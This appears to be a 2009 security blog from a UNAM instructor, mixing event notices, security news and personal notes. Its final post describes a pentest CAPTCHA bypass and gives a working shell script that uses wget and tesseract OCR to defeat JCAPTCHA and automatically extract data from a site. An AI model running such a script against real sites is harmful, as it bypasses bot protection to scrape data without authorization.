Monday, November 16, 2009

Día Internacional de la Seguridad en Cómputo

El DISC 2009 México será celebrado el 30 de noviembre de 2009 teniendo como sede el Instituto de Investigaciones en Materiales, localizado dentro de las instalaciones de Ciudad Universitaria.

El DISC es el Día Internacional de la Seguridad en Cómputo. Es una celebración convocada por la Association for Computing Machinery (ACM) en el año de 1988 con el propósito de incrementar el nivel de conciencia en relación a los problemas de la seguridad en cómputo. Con el paso de los años ha ido aumentando a nivel mundial el interés por este día. El Departamento de Seguridad en Cómputo/UNAM-CERT de la Dirección General de Servicios de Cómputo Académico es el organismo oficial en México encargado de celebrar el DISC desde 1994.

En esta emisión, el tema principal del DISC será "La primera defensa eres tú".

Link

CAPTCHA Security: A Case Study

"CAPTCHAs have been widely used across the Internet to defend against undesirable or malicious bot programs. In this article, the authors describe the security of a CAPTCHA reported in a recent peer-reviewed paper and deployed on the Internet. They show that although this scheme was effectively resistant to one of the best optical character recognition programs on the market, they could break it with a success rate of higher than 90 percent by using a simple but novel attack. In contrast to early work that relied on sophisticated computer vision or machine learning algorithms, they used simple pattern recognition algorithms that exploited fatal design errors. The main contribution of their work is that simply counting the pixels in a CAPTCHA's characters can be a very powerful attack."

Link to e-article.

Friday, October 23, 2009

Friday, October 16, 2009

Evolt

One of the founding members of evolt.org, Adrian Roselli, has provided the archive as well as its support through his company, Algonquin Studios.
Lots of legacy browsers...

Wednesday, August 19, 2009

Seminario de seguridad en la UNAM

La Facultad de Ingeniería a través de la División de Ingeniería Eléctrica hace una atenta invitación a:

Seminarios impartidos por:

Ing. Pavel Ocenasek, graduating PhD candidate
Brno University of Technology, Czech Republic
http://pavel.ocenasek.com/

Sala de videoconferencia del Centro de Docencia, Anexo de la Facultad de Ingeniería

21, 24 y 25 de Agosto 2009, de 12:00 a 14:00

Seminarios sobre los tópicos:

- Security Protocols and Authentication/Key Distribution Schemes
- Evolutionary Computation in Network Communication
- Evolutionary Algorithms in Security Design
- Computer Networks and Security
- CISCO Networking technologies (routers, switches, LAN, WAN, ...)
- Web Technologies and Security
- Web Accessibility
- Electronic Commerce, Payment Systems and Payment Protocols

Wednesday, August 12, 2009

New semester

Today is the third day of a new semester at UNAM (both Bs and Ms). I have 6 students at "selected topics of security", we will be working with OSSTMM and vulnerability analysis, as well as fuzzing and other cool topics. The first challenge we met as teachers is to learn the names of the students, I only have 6 now, but used to be 40 when teaching other classes, I found a link with useful steps to remember most of the names, it's here.

Thursday, June 11, 2009

Security Flaw Hits VAserv; Head of LxLabs Found Hanged

"The discovery of 24 security vulnerabilities may have contributed to the death of the chief of LxLabs. A flaw in the company's HyperVM software allowed data on 100,000 sites, all hosted by VAserv, to be destroyed. The HyperVM solution is popular with cheap web hosting services and the attacks are easy to reproduce, which could lead to further incidents."

Link to the news
.

Tuesday, April 28, 2009

Off-topic: Summit @ Pico de Orizaba

This is totally an off-topic but it represents a personal achievement for me. Last sunday, April 26th I climbed Citlaltépetl to the summit (5630 msnm/masl), highest point in Mexico at 6:45 am local time.

Thanks to the brave and professional fellows at Grupo Universitario de Alta Montaña (UNAM) Here's the link to the pictures. Mens sana in corpore sano.

Thursday, April 23, 2009

New token from Banamex

A month ago I got an e-mail from Banamex (but hadn't had time to write down a blog entry) notifying of a new scheme to access to online bank system. (It's not a coincidence that Banamex is one of the main targets in Mexico for online fraud, they have a very weak system to authenticate users through an event-based token). It's good news to know that finally they're moving to a more effective system (although not fool-proof, there's still a scenario with MITM).

I haven't received the new token, so I don't have a first-hand experience yet, BUT... I hope the challenge-response scheme they're announcing implements TIME-BASED numbers and not only EVENT-BASED like they do now.

Tuesday, January 6, 2009

Captcha circumvention

Last week I was trying to bypass a captcha implementation (JCAPTCHA) on a website I was hired to pentest. Although captchas can get very difficult to bypass I found a "weak link" through the WAP portion of the portal in question and I could extract a significant portion of data abusing the nonexistent distortion of the letters shown in the image.


You'll see, there is an OCR (optical character recognition softare) in Linux (tesseract) capable of "reading" the image given to the user, then this tool will write the characters to a text-file.
Using wget we can start http queries to a website, save and load cookies and write data to the filesystem. Putting it all together, we got a shellscript that will circumvent the captcha protection and extract the data in an automatic fashion (it's effective around 60%).

#!/bin/sh

wget http://www.somesite.com/jcaptcha --save-cookies cookies.txt --keep-session-cookies -O /tmp/captcha.jpg 2> /dev/null
djpeg -grayscale /tmp/captcha.jpg | convert - /tmp/captcha.tiff
tesseract /tmp/captcha.tiff jcaptcha
cap=`cat jcaptcha.txt`
wget "http://www.somesite.com/servlet?niv=&nrpv=&query=$somevalue&captcha=$cap" --load-cookies cookies.txt -O salida.txt 2> /dev/null
tam=`wc -c salida.txt| cut -c1-3`
echo $tam
if [ $tam -ne 701 ]; then
mv salida.txt $query.txt
fi

You may wonder why the script uses a length of 701 bytes to detect if the captcha has been defeated, well, it's just assuming the default "error" page has a length of 701 bytes, any other length it's assumed as info extracted from the database (ok, it's not the best approach, but it's just a PoC).